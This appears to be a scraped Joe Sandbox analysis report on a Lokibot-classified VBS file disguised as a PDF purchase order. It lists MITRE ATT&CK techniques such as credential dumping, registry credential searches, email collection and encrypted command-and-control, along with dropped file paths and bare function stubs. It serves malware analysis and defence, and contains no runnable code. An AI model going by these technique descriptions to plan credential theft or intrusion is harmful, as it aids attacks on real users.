Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log

C:\Users\user\AppData\Local\Temp\x.exe

C:\Users\user\AppData\Roaming\188E93\31437F.exe

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\21c8026919fd094ab07ec3c180a9f210_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs

Function 0495ACA0 Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Function 0495D040 Relevance: 1.7, APIs: 1, Instructions: 236
processCOMMON

Function 0070DB40 Relevance: 1.6, APIs: 1, Instructions: 112
libraryCOMMON

Function 0495D710 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Function 0070DEB8 Relevance: 1.6, APIs: 1, Instructions: 96
memoryCOMMON

Function 0495D5D0 Relevance: 1.6, APIs: 1, Instructions: 95
memoryCOMMON

Function 0495D378 Relevance: 1.6, APIs: 1, Instructions: 88
threadCOMMON

Function 0495B0E0 Relevance: 1.6, APIs: 1, Instructions: 87
COMMON

Function 0495ADD0 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Function 0495D8D0 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Function 0070F0C8 Relevance: 1.3, APIs: 1, Instructions: 94
memoryCOMMON

Function 00403D74 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 200
fileCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre